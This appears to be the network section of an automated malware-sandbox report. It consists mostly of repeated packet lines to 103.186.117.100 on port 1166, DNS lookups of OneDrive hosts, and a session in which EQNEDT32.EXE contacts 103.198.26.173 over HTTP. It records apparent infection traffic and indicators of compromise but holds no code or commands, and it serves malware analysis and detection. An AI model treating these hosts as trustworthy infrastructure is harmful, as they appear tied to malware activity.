                                                                                                                                                                                  Apr 24, 2024 07:42:20.327198982 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:20.327258110 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:20.327269077 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:20.327313900 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:20.327378988 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:20.327378988 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:20.327433109 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:20.327490091 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:20.327490091 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:20.327554941 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:20.327611923 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:20.327620983 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:20.327682972 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:20.327737093 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:20.327743053 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:20.327796936 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:20.327843904 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:20.327852964 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:20.327989101 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:20.328043938 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:20.328058004 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:20.328083992 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:20.328147888 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:20.328207970 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:20.328272104 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:20.328327894 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:20.328336954 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:20.328392982 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:20.328444958 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:20.328444958 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:20.328524113 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:20.328573942 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:20.328578949 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:20.328614950 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:20.328669071 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:20.328676939 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:20.328706026 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:20.328742027 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:20.328783989 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:20.328795910 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:20.328852892 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:20.328860998 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:20.328907013 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:20.328963995 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:20.328965902 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:20.329001904 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:20.329035997 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:20.329051018 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:20.329072952 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:20.329108953 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:20.329130888 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:20.329145908 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:20.329191923 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:20.329200983 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:20.329227924 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:20.329282045 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:20.487531900 CEST116649172103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:20.522245884 CEST116649172103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:20.724265099 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:20.724265099 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:20.724303007 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:20.724379063 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:20.724453926 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:20.724597931 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:20.724643946 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.106803894 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.106893063 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.106954098 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.107336044 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.107389927 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.107460022 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.107481956 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.107537031 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.107574940 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.107594967 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.107708931 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.107759953 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.112710953 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.112812042 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.112849951 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.112888098 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.112905025 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.112962008 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.113034010 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.113073111 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.113128901 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.113251925 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.113313913 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.113360882 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.113370895 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.113398075 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.113455057 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.113503933 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.113558054 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.113609076 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.113610983 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.113648891 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.113708019 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.113725901 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.113795042 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.113847017 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.113852024 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.113898993 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.113954067 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.113964081 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.114020109 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.114080906 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.114092112 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.114130974 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.114176035 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.114187002 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.114223957 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.114259005 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.114279032 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.114350080 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.114407063 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.114414930 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.114516973 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.114556074 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.114573002 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.114619970 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.114667892 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.114670992 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.114729881 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.114809036 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.115957975 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.116034985 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.116113901 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.116220951 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.116277933 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.116329908 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.116334915 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.116380930 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.116427898 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.116434097 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.116482019 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.116534948 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.116580963 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.116630077 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.116693020 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.116703987 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.116760969 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.116812944 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.116817951 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.116872072 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.116933107 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.116950035 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.116988897 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117048979 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117063046 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117124081 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117171049 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117177010 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117228985 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117275953 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117311954 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117330074 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117386103 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117392063 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117434978 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117471933 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117494106 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117562056 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117654085 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117697001 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117754936 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117810011 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117810011 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117882967 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117930889 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:17.888453007 CEST6267253192.168.2.228.8.8.8
                                                                                                                                                                                  Apr 24, 2024 07:42:18.058909893 CEST53626728.8.8.8192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:30.256521940 CEST5647553192.168.2.228.8.8.8
                                                                                                                                                                                  Apr 24, 2024 07:42:30.530210018 CEST4938453192.168.2.228.8.8.8
                                                                                                                                                                                  Apr 24, 2024 07:42:30.706381083 CEST5484253192.168.2.228.8.8.8
                                                                                                                                                                                  Apr 24, 2024 07:42:32.674868107 CEST5810553192.168.2.228.8.8.8
                                                                                                                                                                                  Apr 24, 2024 07:42:33.252065897 CEST6492853192.168.2.228.8.8.8
                                                                                                                                                                                  Apr 24, 2024 07:42:39.826627016 CEST5739053192.168.2.228.8.8.8
                                                                                                                                                                                  Apr 24, 2024 07:42:40.332588911 CEST5809553192.168.2.228.8.8.8
                                                                                                                                                                                  Apr 24, 2024 07:42:40.521725893 CEST5426153192.168.2.228.8.8.8
                                                                                                                                                                                  Apr 24, 2024 07:42:42.227965117 CEST6050753192.168.2.228.8.8.8
                                                                                                                                                                                  Apr 24, 2024 07:42:42.576282024 CEST5044653192.168.2.228.8.8.8
                                                                                                                                                                                  Apr 24, 2024 07:43:00.015702963 CEST5593953192.168.2.228.8.8.8
                                                                                                                                                                                  Apr 24, 2024 07:43:00.213288069 CEST4960853192.168.2.228.8.8.8
                                                                                                                                                                                  Apr 24, 2024 07:43:00.387130976 CEST6148653192.168.2.228.8.8.8
                                                                                                                                                                                  Apr 24, 2024 07:43:02.156589985 CEST6245353192.168.2.228.8.8.8
                                                                                                                                                                                  Apr 24, 2024 07:43:02.339688063 CEST5056853192.168.2.228.8.8.8
                                                                                                                                                                                  Apr 24, 2024 07:42:30.876983881 CEST8.8.8.8192.168.2.220x19d9No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:30.876983881 CEST8.8.8.8192.168.2.220x19d9No error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:30.876983881 CEST8.8.8.8192.168.2.220x19d9No error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:30.876983881 CEST8.8.8.8192.168.2.220x19d9No error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:32.844805002 CEST8.8.8.8192.168.2.220x148eNo error (0)oqgpra.db.files.1drv.comdb-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:32.844805002 CEST8.8.8.8192.168.2.220x148eNo error (0)db-files.fe.1drv.comodc-db-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:33.447045088 CEST8.8.8.8192.168.2.220xf078No error (0)oqgpra.db.files.1drv.comdb-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:33.447045088 CEST8.8.8.8192.168.2.220xf078No error (0)db-files.fe.1drv.comodc-db-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:39.996619940 CEST8.8.8.8192.168.2.220x74c9No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:39.996619940 CEST8.8.8.8192.168.2.220x74c9No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:39.996619940 CEST8.8.8.8192.168.2.220x74c9No error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:39.996619940 CEST8.8.8.8192.168.2.220x74c9No error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:39.996619940 CEST8.8.8.8192.168.2.220x74c9No error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:40.502870083 CEST8.8.8.8192.168.2.220xafe2No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:40.502870083 CEST8.8.8.8192.168.2.220xafe2No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:40.502870083 CEST8.8.8.8192.168.2.220xafe2No error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:40.502870083 CEST8.8.8.8192.168.2.220xafe2No error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:40.502870083 CEST8.8.8.8192.168.2.220xafe2No error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:40.691591024 CEST8.8.8.8192.168.2.220x7e6bNo error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:40.691591024 CEST8.8.8.8192.168.2.220x7e6bNo error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:40.691591024 CEST8.8.8.8192.168.2.220x7e6bNo error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:40.691591024 CEST8.8.8.8192.168.2.220x7e6bNo error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:40.691591024 CEST8.8.8.8192.168.2.220x7e6bNo error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:42.573425055 CEST8.8.8.8192.168.2.220x5eaeNo error (0)oqgpra.db.files.1drv.comdb-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:42.573425055 CEST8.8.8.8192.168.2.220x5eaeNo error (0)db-files.fe.1drv.comodc-db-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:42.746292114 CEST8.8.8.8192.168.2.220x4a95No error (0)oqgpra.db.files.1drv.comdb-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:42.746292114 CEST8.8.8.8192.168.2.220x4a95No error (0)db-files.fe.1drv.comodc-db-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:43:00.187052011 CEST8.8.8.8192.168.2.220x591cNo error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:43:00.187052011 CEST8.8.8.8192.168.2.220x591cNo error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:43:00.187052011 CEST8.8.8.8192.168.2.220x591cNo error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:43:00.187052011 CEST8.8.8.8192.168.2.220x591cNo error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:43:00.187052011 CEST8.8.8.8192.168.2.220x591cNo error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:43:00.383583069 CEST8.8.8.8192.168.2.220x52a6No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:43:00.383583069 CEST8.8.8.8192.168.2.220x52a6No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:43:00.383583069 CEST8.8.8.8192.168.2.220x52a6No error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:43:00.383583069 CEST8.8.8.8192.168.2.220x52a6No error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:43:00.383583069 CEST8.8.8.8192.168.2.220x52a6No error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:43:00.557641983 CEST8.8.8.8192.168.2.220x5e23No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:43:00.557641983 CEST8.8.8.8192.168.2.220x5e23No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:43:00.557641983 CEST8.8.8.8192.168.2.220x5e23No error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:43:00.557641983 CEST8.8.8.8192.168.2.220x5e23No error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:43:00.557641983 CEST8.8.8.8192.168.2.220x5e23No error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:43:02.337326050 CEST8.8.8.8192.168.2.220xab57No error (0)oqgpra.db.files.1drv.comdb-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:43:02.337326050 CEST8.8.8.8192.168.2.220xab57No error (0)db-files.fe.1drv.comodc-db-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:43:02.510268927 CEST8.8.8.8192.168.2.220x51e6No error (0)oqgpra.db.files.1drv.comdb-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:43:02.510268927 CEST8.8.8.8192.168.2.220x51e6No error (0)db-files.fe.1drv.comodc-db-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
• onedrive.live.com
• 103.198.26.173
• geoplugin.net

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49163 | 103.198.26.173 | 80 | 3264 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp | Bytes transferred | Direction | Data
